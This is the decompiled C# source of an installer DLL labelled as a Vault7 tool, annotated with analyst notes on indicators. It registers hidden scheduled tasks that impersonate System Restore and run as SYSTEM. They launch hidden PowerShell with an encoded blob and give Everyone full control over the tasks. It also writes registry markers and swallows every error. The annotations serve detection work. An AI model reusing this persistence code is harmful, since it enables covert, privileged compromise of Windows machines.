Installer.dll (Vault7)
// Decompiled with JetBrains decompiler | |
// Type: Installer.Install | |
// Assembly: Installer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null | |
// MVID: 1DF6A781-016A-4A47-9C62-874A888EB357 | |
// Assembly location: | |
using \u0004; | |
using \u0006; | |
using Microsoft.Win32; | |
using System; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
using TaskScheduleHelper; | |
namespace Installer | |
{ | |
/// <summary>
/// Decompiled installer class. Member names were obfuscated to control characters by the
/// original build, hence the \u0001-style identifiers; overloads are told apart only by
/// their parameter lists. <c>\u0001.\u0001()</c> refers to a helper type in another
/// namespace (<c>using \u0004; using \u0006;</c>) whose body is not on this page.
/// Constructing the object performs three host changes in order: an HKLM registry marker,
/// Task Scheduler changes (one deletion, two hidden task registrations under SYSTEM), and
/// an Internet Explorer policy value. Every step swallows its exceptions, so nothing is
/// ever reported. The HKLM writes and SYSTEM task registrations can only succeed with
/// administrative rights.
/// Defender notes: the observable artifacts (registry paths, task folder/name pairs, the
/// PowerShell command line) are called out on each method below.
/// </summary>
public class Install | |
{ | |
// Task Scheduler folder used for the main persistence task (see \u0003(ITaskService)).
private static string \u0001 = "\\Microsoft\\Windows\\Maintenance"; | |
// Task name "SR". The TrimEnd() on a literal with a trailing space looks like a remnant
// of build-time string substitution; the same pattern recurs on lines below.
private static string \u0002 = "SR ".TrimEnd(); | |
/// <summary>
/// Runs the whole installation: registry marker, scheduled tasks, then the IE policy value.
/// </summary>
public Install() | |
{ | |
this.\u0002(); | |
this.\u0003(); | |
this.\u0001(); | |
} | |
/// <summary>
/// Writes HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = 1.
/// NOTE(review): presumably suppresses the IE first-run dialog so later automation runs
/// silently; the consumer of that setting is not on this page. Any failure is swallowed
/// and <c>ex</c> is never used.
/// </summary>
private void \u0001() | |
{ | |
try | |
{ | |
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Main").SetValue("DisableFirstRunCustomize", (object) 1); | |
} | |
catch (Exception ex) | |
{ | |
} | |
} | |
/// <summary>
/// Creates HKLM\SOFTWARE\Microsoft\DRM\{cd704ff3-cd05-479e-acf7-6474908031dd} and stores
/// DateTime.Now.ToBinary() (local time, binary-encoded) in its default value.
/// NOTE(review): reads like an install-time marker parked under a legitimate-looking key;
/// the GUID subkey is a host indicator worth checking for. Failure is swallowed.
/// </summary>
private void \u0002() | |
{ | |
try | |
{ | |
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\DRM\\").CreateSubKey("{cd704ff3-cd05-479e-acf7-6474908031dd}").SetValue((string) null, (object) DateTime.Now.ToBinary()); | |
} | |
catch (Exception ex) | |
{ | |
} | |
} | |
/// <summary>
/// Obtains an ITaskService from the external helper, connects to the local Task Scheduler
/// (four null Connect arguments = local machine, caller's credentials) and applies the
/// three task changes below. One bare catch covers all of it.
/// </summary>
private void \u0003() | |
{ | |
try | |
{ | |
ITaskService taskService = \u0001.\u0001(); | |
taskService.Connect((object) null, (object) null, (object) null, (object) null); | |
this.\u0001(taskService); | |
this.\u0002(taskService); | |
this.\u0003(taskService); | |
} | |
catch | |
{ | |
} | |
} | |
/// <summary>
/// Deletes the task "CheckDisk" from \Microsoft\Windows\Maintenance; a missing task (or any
/// other error) is ignored. The second DeleteTask argument is the reserved flags word.
/// NOTE(review): whether "CheckDisk" is an earlier version of this installer's own task or
/// an unrelated task cannot be determined from this page.
/// </summary>
/// <param name="obj0">Connected Task Scheduler service.</param>
private void \u0001([In] ITaskService obj0) | |
{ | |
ITaskFolder folder = obj0.GetFolder("Microsoft\\Windows\\Maintenance"); | |
try | |
{ | |
folder.DeleteTask("CheckDisk", 0); | |
} | |
catch | |
{ | |
} | |
} | |
/// <summary>
/// Registers a hidden task named "System" in \Microsoft\Windows\Task Manager unless one
/// already exists. The action is a COM handler (CLSID {855fec53-d2e4-4999-9e87-3414e9cf0ff4})
/// whose Data "$(Arg0)" forwards the first run-time argument; what that CLSID resolves to is
/// not on this page. Author/Source/Description are copied from the existing "Interactive"
/// task in the same folder so the new entry looks like its sibling. If "Interactive" is
/// absent, GetTask throws and the outer catch silently abandons the registration.
/// Defender notes: the task runs as the SYSTEM service account, and the SDDL string grants
/// Everyone (S-1-1-0) an allow ACE that includes WD (write DAC), WO (write owner) and GA
/// (generic all) — any local user could read or rewrite the task. The creation flag 2 is
/// TASK_CREATE.
/// </summary>
/// <param name="obj0">Connected Task Scheduler service.</param>
private void \u0002([In] ITaskService obj0) | |
{ | |
ITaskFolder folder = obj0.GetFolder("\\Microsoft\\Windows\\Task Manager"); | |
try | |
{ | |
IRegisteredTask registeredTask = (IRegisteredTask) null; | |
// Probe: FileNotFoundException means the task does not exist yet.
try | |
{ | |
registeredTask = folder.GetTask("System"); | |
} | |
catch (FileNotFoundException ex) | |
{ | |
} | |
// Never overwrite an existing "System" task.
if (registeredTask != null) | |
return; | |
IRegisteredTask task = folder.GetTask("Interactive"); | |
ITaskDefinition pDefinition = obj0.NewTask(0U); | |
pDefinition.Settings.AllowDemandStart = true; | |
pDefinition.Settings.MultipleInstances = _TASK_INSTANCES_POLICY.TASK_INSTANCES_PARALLEL; | |
pDefinition.Settings.DisallowStartIfOnBatteries = false; | |
pDefinition.Settings.Hidden = true; | |
pDefinition.Settings.Priority = 5; | |
// Registration metadata is cloned from the neighbouring task, not authored here.
pDefinition.RegistrationInfo.Author = task.Definition.RegistrationInfo.Author; | |
pDefinition.RegistrationInfo.Version = "1.0"; | |
pDefinition.RegistrationInfo.Source = task.Definition.RegistrationInfo.Source; | |
pDefinition.RegistrationInfo.Description = task.Definition.RegistrationInfo.Description; | |
IComHandlerAction comHandlerAction = (IComHandlerAction) pDefinition.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_COM_HANDLER); | |
comHandlerAction.ClassId = "{855fec53-d2e4-4999-9e87-3414e9cf0ff4}"; | |
comHandlerAction.Data = "$(Arg0)"; | |
// Security descriptor applied to the task: Everyone gets full control.
string str = "D:(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-1-0)"; | |
folder.RegisterTaskDefinition("System", pDefinition, 2, (object) "SYSTEM", (object) null, _TASK_LOGON_TYPE.TASK_LOGON_SERVICE_ACCOUNT, (object) str); | |
} | |
catch | |
{ | |
} | |
} | |
/// <summary>
/// Builds the PowerShell -Command argument used by \u0003(ITaskService):
/// a double-quoted string of the form "$tn='SR';$tf='\Microsoft\Windows\Maintenance';..."
/// followed by the script text returned by the external helper's string overload. The
/// script body is not on this page; presumably $tn/$tf let it locate its own task
/// registration — confirm against the helper.
/// </summary>
/// <returns>The quoted command string.</returns>
private string \u0001() | |
{ | |
return "\"$tn='" + Install.\u0002 + "';$tf='" + Install.\u0001 + "';" + \u0001.\u0001() + "\""; | |
} | |
/// <summary>
/// Base64-encodes the byte[] returned by the external helper's byte-array overload. The
/// result is stored in the task's Data element by \u0003(ITaskService); the content of the
/// blob is not visible here.
/// </summary>
/// <returns>Base64 text.</returns>
private string \u0002() | |
{ | |
return Convert.ToBase64String(\u0001.\u0001()); | |
} | |
/// <summary>
/// Registers the main persistence task "SR" in \Microsoft\Windows\Maintenance, replacing
/// any task of that name. Its display strings are resource references into
/// srrstr.dll, so it appears to mimic the built-in System Restore task. It runs PowerShell
/// hidden, non-interactive and with execution policy "unrestricted", repeating every
/// 8 h 6 min from a fixed 2016-01-21 start boundary, as LocalSystem at highest run level,
/// and carries the Base64 blob from \u0002() in its Data element.
/// Defender notes: the scheduled-task name/folder, the powershell command line on the
/// Arguments line, and the Everyone-full-control SDDL are the concrete detection points.
/// All errors are swallowed.
/// </summary>
/// <param name="obj0">Connected Task Scheduler service.</param>
private void \u0003([In] ITaskService obj0) | |
{ | |
try | |
{ | |
ITaskFolder folder = obj0.GetFolder(Install.\u0001); | |
// Remove a previous "SR" registration; a missing task is ignored.
try | |
{ | |
folder.DeleteTask(Install.\u0002, 0); | |
} | |
catch (Exception ex) | |
{ | |
} | |
ITaskDefinition taskDefinition = obj0.NewTask(0U); | |
// "$(@dll,-id)" is the Task Scheduler resource-string syntax; the strings are
// pulled from System Restore's own DLL at display time.
taskDefinition.RegistrationInfo.Author = "$(@%systemroot%\\system32\\srrstr.dll,-321)"; | |
taskDefinition.RegistrationInfo.Source = "$(@%systemroot%\\system32\\srrstr.dll,-320)"; | |
taskDefinition.RegistrationInfo.Description = "$(@%systemroot%\\system32\\srrstr.dll,-322)"; | |
taskDefinition.Settings.StartWhenAvailable = true; | |
taskDefinition.Settings.RunOnlyIfNetworkAvailable = true; | |
taskDefinition.Settings.StopIfGoingOnBatteries = false; | |
taskDefinition.Settings.DisallowStartIfOnBatteries = false; | |
taskDefinition.Settings.Hidden = true; | |
// Principal: group logon under the localized name of the LocalSystem account.
NTAccount ntAccount = (NTAccount) new SecurityIdentifier(WellKnownSidType.LocalSystemSid, (SecurityIdentifier) null).Translate(typeof (NTAccount)); | |
taskDefinition.Principal.RunLevel = _TASK_RUNLEVEL.TASK_RUNLEVEL_HIGHEST; | |
taskDefinition.Principal.LogonType = _TASK_LOGON_TYPE.TASK_LOGON_GROUP; | |
taskDefinition.Principal.GroupId = ntAccount.ToString(); | |
taskDefinition.Data = this.\u0002(); | |
IExecAction execAction = (IExecAction) taskDefinition.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_EXEC); | |
execAction.Path = "powershell"; | |
execAction.Arguments = "-executionPolicy unrestricted -WindowStyle Hidden -NonInteractive -Command " + this.\u0001(); | |
// Repetition interval is ISO 8601 duration PT8H6M; trailing-space TrimEnd() again.
ITimeTrigger timeTrigger = (ITimeTrigger) taskDefinition.Triggers.Create(_TASK_TRIGGER_TYPE2.TASK_TRIGGER_TIME); | |
timeTrigger.Repetition.Interval = "PT8H6M ".TrimEnd(); | |
timeTrigger.Repetition.StopAtDurationEnd = false; | |
timeTrigger.Enabled = true; | |
// The "0" check can never be true for this literal; it looks like a build-time
// template where "0" meant "start now". The branch taken here is the fixed date.
string str1 = "2016-01-21T00:00:00.0000000 ".TrimEnd(); | |
timeTrigger.StartBoundary = !str1.Equals("0") ? str1 : DateTime.Now.ToString("o"); | |
// Same Everyone-full-control SDDL as the "System" task.
string str2 = "D:(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-1-0)"; | |
// The schema version attribute is stripped from the generated XML before
// registration; presumably to avoid a version mismatch on older hosts — confirm.
string XmlText = taskDefinition.XmlText.Replace("Task version=\"1.2\"", "Task "); | |
folder.RegisterTask(Install.\u0002, XmlText, 2, (object) "SYSTEM", (object) null, _TASK_LOGON_TYPE.TASK_LOGON_SERVICE_ACCOUNT, (object) str2); | |
} | |
catch (Exception ex) | |
{ | |
} | |
} | |
} | |
} |